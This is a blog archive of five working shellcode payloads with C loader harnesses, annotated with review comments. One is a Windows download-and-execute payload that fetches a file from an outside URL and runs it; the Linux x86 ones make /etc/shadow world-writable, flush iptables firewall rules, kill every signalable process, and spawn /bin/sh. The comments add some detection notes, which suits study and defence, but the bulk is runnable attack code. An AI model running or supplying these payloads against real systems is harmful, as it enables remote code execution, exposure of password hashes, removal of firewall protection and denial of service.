Archive for shellcode

Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode

Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode

/*
Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode
Date: 2013-22-01
Author: RubberDuck
Web: http://bflow.security-portal.cz
http://www.security-portal.cz
Tested on: Win 2k, Win XP Home SP2/SP3 CZ (32), Win 7 (32/64)
-- file is downloaded from URL http://bflow.security-portal.cz/down/xy.txt
-- xy.txt - http://www.virustotal.com/file/7d0d68f8e378d5aa29620c749f797d1d5fa05356fbf6f9ca64ba00f00fe86182/analysis/1358866648/
-- xy.txt only shows MessageBox with text "Test application for Allwin URLDownloadToFile shellcode"
and title ">> Author: RubberDuck - http://bflow.security-portal.cz <<"
 
*/
 
#include <windows.h>
#include <stdio.h>
 
/*
 * Loader harness for the embedded 32-bit Windows payload: the bytes are copied
 * into a newly committed read/write/execute region and called as a function.
 *
 * Payload behaviour as readable from the ASCII immediates in the byte string
 * (NOTE(review): decoded statically from the bytes below, not executed):
 *   1. reads fs:[0x30] and follows the loader's module list to a module base,
 *      presumably kernel32.dll, then scans that module's export names for
 *      "GetProcAddress";
 *   2. resolves "LoadLibraryA" and loads "urlmon.dll";
 *   3. resolves "URLDownloadToFileA" and fetches the URL appended after the
 *      code into a file named "dead.exe" (a relative name, so presumably
 *      created in the process's current directory);
 *   4. resolves "WinExec" and starts that file with uCmdShow = 5;
 *   5. resolves "ExitProcess" and calls it.
 *
 * Artefacts a defender can key on, all taken from this listing: a private
 * PAGE_EXECUTE_READWRITE allocation that is then executed, urlmon.dll loaded
 * at run time, an HTTP fetch of the URL below, creation of "dead.exe", and a
 * child process started from it.
 */
int main(){
/* Code bytes first, then the NUL-terminated download URL as trailing data. */
unsigned char shellcode[] =
"\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B"
"\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53"
"\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72"
"\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81"
"\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04"
"\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64"
"\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3"
"\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3"
"\x8B\x14\x8E\x03\xD3\x33\xC9\x51\x68\x2E"
"\x65\x78\x65\x68\x64\x65\x61\x64\x53\x52"
"\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62"
"\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2"
"\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C"
"\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C"
"\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24"
"\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33"
"\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64"
"\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C"
"\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24"
"\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83"
"\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68"
"\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57"
"\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D"
"\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A"
"\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03"
"\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69"
"\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF"
"\xFF\xFF"
// http://bflow.security-portal.cz/down/xy.txt
"\x68\x74\x74\x70\x3A\x2F\x2F\x62"
"\x66\x6C\x6F\x77\x2E\x73\x65\x63\x75\x72"
"\x69\x74\x79\x2D\x70\x6F\x72\x74\x61\x6C"
"\x2E\x63\x7A\x2F\x64\x6F\x77\x6E\x2F\x78"
"\x79\x2E\x74\x78\x74\x00";
 
LPVOID lpAlloc = NULL;
void (*pfunc)();
 
/* One 4096-byte region that is writable and executable at the same time.
   NOTE(review): RWX private memory is the property memory scanners look for. */
lpAlloc = VirtualAlloc(0, 4096,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
 
if(lpAlloc == NULL){
printf("Memory isn't allocated!\n");
return 0;
}
 
/* lstrlenA() stops at the first zero byte; the only one in the array is the
   URL terminator at the very end, so code and URL are copied in full (+1
   keeps the terminator). */
memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1);
 
/* Treat the start of the copied bytes as a function with no arguments. */
pfunc = (void (*)())lpAlloc;
 
/* Presumably does not return: the payload's last resolved call is ExitProcess. */
pfunc();
 
return 0;
}
 

linux/x86 execve-chmod 0777 /etc/shadow 58 bytes shellcode

linux/x86 execve-chmod 0777 /etc/shadow 58 bytes shellcode

***************************************************************
* Linux/x86 execve-chmod 0777 /etc/shadow  58 bytes 
***************************************************************
* Author: Hamza Megahed                             
***************************************************************
* Twitter: @Hamza_Mega                              
***************************************************************
* blog: hamza-mega[dot]blogspot[dot]com             
***************************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com        
***************************************************************
 
# Builds three NUL-terminated strings on the stack, then issues
# execve("///bin/chmod", {"///bin/chmod", "0777", "/etc//shadow", NULL}, NULL).
# NOTE(review): the path is spelled with a doubled slash, so a rule that matches
# the literal text "/etc/shadow" in exec arguments would not see it; compare
# normalised paths instead.
xor    %eax,%eax            # eax = 0: used for NUL terminators and NULL pointers
push   %eax                 # terminator for the target path
pushl  $0x776f6461          # "adow"
pushl  $0x68732f2f          # "//sh"
pushl  $0x6374652f          # "/etc"  -> "/etc//shadow"
movl   %esp,%esi            # esi = address of "/etc//shadow"
push   %eax                 # terminator for the mode string
pushl  $0x37373730          # "0777"
movl   %esp,%ebp            # ebp = address of "0777"
push   %eax                 # terminator for the program path
pushl  $0x646f6d68          # "hmod"
pushl  $0x632f6e69          # "in/c"
pushl  $0x622f2f2f          # "///b"  -> "///bin/chmod"
mov    %esp,%ebx            # ebx = program path (first execve argument)
pushl  %eax                 # argv[3] = NULL
pushl  %esi                 # argv[2] = "/etc//shadow"
pushl  %ebp                 # argv[1] = "0777"
pushl  %ebx                 # argv[0] = "///bin/chmod"
movl   %esp,%ecx            # ecx = argv (second execve argument)
mov    %eax,%edx            # edx = NULL envp (third execve argument)
mov    $0xb,%al             # syscall number 11 = execve on 32-bit x86 Linux
int    $0x80                # 32-bit system call entry
 
********************************
#include <stdio.h>
#include <string.h>
 
/*
 * Assembled form of the AT&T listing above: 58 bytes, none of them zero, so
 * strlen() on this pointer reports the full payload length.
 * It is a string literal, i.e. constant data, not a function.
 */
char *shellcode = 
"\x31\xc0\x50\x68\x61\x64\x6f\x77\x68\x2f\x2f\x73"
"\x68\x68\x2f\x65\x74\x63\x89\xe6\x50\x68\x30\x37"
"\x37\x37\x89\xe5\x50\x68\x68\x6d\x6f\x64\x68\x69"
"\x6e\x2f\x63\x68\x2f\x2f\x2f\x62\x89\xe3\x50\x56"
"\x55\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
 
 
 
 
 
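/*
 * Test driver: prints the payload length, then calls the bytes that
 * `shellcode` points to as if they were a function.
 *
 * Returns 0 only if the call comes back; the payload ends in execve(), which
 * replaces the process image when it succeeds.
 */
int main(void)
{
    /* strlen() returns size_t, so the matching conversion is %zu; passing a
       size_t for %d is undefined behaviour where size_t is wider than int. */
    fprintf(stdout,"Length: %zu\n",strlen(shellcode));
    /* NOTE(review): this call depends on the string literal's storage being
       executable. Where read-only data is mapped non-executable (NX / W^X),
       the call faults instead of running the bytes. */
    (*(void(*)()) shellcode)();
    return 0;
}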

linux/x86 iptables --flush 43 bytes shellcode

linux/x86 iptables --flush 43 bytes shellcode

************************************************************
*      Linux/x86 iptables --flush 43 bytes                 *
************************************************************
*          Author: Hamza Megahed                           *
************************************************************
*              Twitter: @Hamza_Mega                        *
************************************************************
*      blog: hamza-mega[dot]blogspot[dot]com               * 
*    E-mail: hamza[dot]megahed[at]gmail[dot]com            *
************************************************************
 
 
# Builds two NUL-terminated strings on the stack, then issues
# execve("///sbin/iptables", {"///sbin/iptables", "-F", NULL}, NULL).
# NOTE(review): the program path carries redundant leading slashes, so exec
# monitoring should compare normalised paths, not the literal "/sbin/iptables".
xor    %eax,%eax            # eax = 0: used for NUL terminators and NULL pointers
push   %eax                 # terminator for the option string
pushw  $0x462d              # "-F" (16-bit push)
movl   %esp,%esi            # esi = address of "-F"
pushl  %eax                 # terminator for the program path
pushl  $0x73656c62          # "bles"
pushl  $0x61747069          # "ipta"
pushl  $0x2f6e6962          # "bin/"
pushl  $0x732f2f2f          # "///s"  -> "///sbin/iptables"
mov    %esp,%ebx            # ebx = program path (first execve argument)
pushl  %eax                 # argv[2] = NULL
pushl  %esi                 # argv[1] = "-F"
pushl  %ebx                 # argv[0] = "///sbin/iptables"
movl   %esp,%ecx            # ecx = argv (second execve argument)
mov    %eax,%edx            # edx = NULL envp (third execve argument)
mov    $0xb,%al             # syscall number 11 = execve on 32-bit x86 Linux
int    $0x80                # 32-bit system call entry
 
********************************
#include <stdio.h>
#include <string.h>
 
/*
 * Assembled form of the AT&T listing above: 43 bytes, none of them zero, so
 * strlen() on this pointer reports the full payload length.
 * It is a string literal, i.e. constant data, not a function.
 */
char *shellcode = "\x31\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73"
"\x68\x69\x70\x74\x61\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f"
"\x73\x89\xe3\x50\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
 
 
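/*
 * Test driver: prints the payload length, then calls the bytes that
 * `shellcode` points to as if they were a function.
 *
 * Returns 0 only if the call comes back; the payload ends in execve(), which
 * replaces the process image when it succeeds.
 */
int main(void)
{
    /* strlen() returns size_t, so the matching conversion is %zu; passing a
       size_t for %d is undefined behaviour where size_t is wider than int. */
    fprintf(stdout,"Length: %zu\n",strlen(shellcode));
    /* NOTE(review): this call depends on the string literal's storage being
       executable. Where read-only data is mapped non-executable (NX / W^X),
       the call faults instead of running the bytes. */
    (*(void(*)()) shellcode)();
    return 0;
}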

BackBox Linux 3.0 – amd64 sys_kill -x86 linux shellcode

BackBox Linux 3.0 – amd64 sys_kill -x86 linux shellcode

#include <stdio.h>
#include <string.h>
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com    
[+] we are 1337day Algeria Community                 
0                                                                      0
1               #########################################              1
0               I'm TrOon member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
*/
 
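/*
 * Machine code for one 32-bit Linux system call, one instruction per line with
 * its AT&T disassembly alongside: al = 0x25 (syscall 37, kill), ebx = -1,
 * cl = 9 (SIGKILL), then int $0x80 -- i.e. kill(-1, 9), which addresses every
 * process the caller is allowed to signal.
 * 11 bytes, none of them zero, so strlen() reports the full length.
 */
char *killer=
"\x31\xc0"                    /* xor    %eax,%eax */
"\xb0\x25"                    /* mov    $0x25,%al */
"\x6a\xff"                    /* push   $0xffffffff */
"\x5b"                        /* pop    %ebx */
"\xb1\x09"                    /* mov    $0x9,%cl */
"\xcd\x80";                   /* int    $0x80 */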
 
 
 
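/*
 * Test driver: prints the payload length, then calls the bytes that `killer`
 * points to as if they were a function taking no arguments.
 */
int main(void)
{
    /* strlen() returns size_t, so the matching conversion is %zu; passing a
       size_t for %d is undefined behaviour where size_t is wider than int. */
    fprintf(stdout,"Length: %zu\n",strlen(killer));
    /* NOTE(review): this call depends on the string literal's storage being
       executable. Where read-only data is mapped non-executable (NX / W^X),
       the call faults instead of running the bytes. */
    ((void (*)(void)) killer)();
    return 0;
}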

Linux/x86 – execve /bin/sh shellcode 23 bytes

Linux/x86 – execve /bin/sh shellcode 23 bytes

******************************************************
* Linux/x86 execve /bin/sh shellcode 23 bytes   *
******************************************************
* Author: Hamza Megahed                                *
******************************************************
* Twitter: @Hamza_Mega                                  *
******************************************************
* blog: hamza-mega[dot]blogspot[dot]com        *
******************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com *
******************************************************
 
# Builds "/bin//sh" on the stack, then issues
# execve("/bin//sh", {"/bin//sh", NULL}, envp) with envp = whatever edx already
# holds; this listing never writes edx.
# NOTE(review): the path is spelled with a doubled slash, so exec monitoring
# should compare normalised paths, not the literal "/bin/sh".
xor    %eax,%eax            # eax = 0: used for the NUL terminator and NULL pointer
push   %eax                 # terminator for the path string
push   $0x68732f2f          # "//sh"
push   $0x6e69622f          # "/bin"  -> "/bin//sh"
mov    %esp,%ebx            # ebx = program path (first execve argument)
push   %eax                 # argv[1] = NULL
push   %ebx                 # argv[0] = "/bin//sh"
mov    %esp,%ecx            # ecx = argv (second execve argument)
mov    $0xb,%al             # syscall number 11 = execve on 32-bit x86 Linux
int    $0x80                # 32-bit system call entry
 
**********************************************
 
#include <stdio.h>
#include <string.h>
 
/*
 * Assembled form of the AT&T listing above: 23 bytes, none of them zero, so
 * strlen() on this pointer reports the full payload length.
 * It is a string literal, i.e. constant data, not a function.
 */
char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
 
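/*
 * Test driver: prints the payload length, then calls the bytes that
 * `shellcode` points to as if they were a function.
 *
 * Returns 0 only if the call comes back; the payload ends in execve(), which
 * replaces the process image when it succeeds.
 */
int main(void)
{
    /* strlen() returns size_t, so the matching conversion is %zu; passing a
       size_t for %d is undefined behaviour where size_t is wider than int. */
    fprintf(stdout,"Length: %zu\n",strlen(shellcode));
    /* NOTE(review): this call depends on the string literal's storage being
       executable. Where read-only data is mapped non-executable (NX / W^X),
       the call faults instead of running the bytes. */
    (*(void(*)()) shellcode)();
    return 0;
}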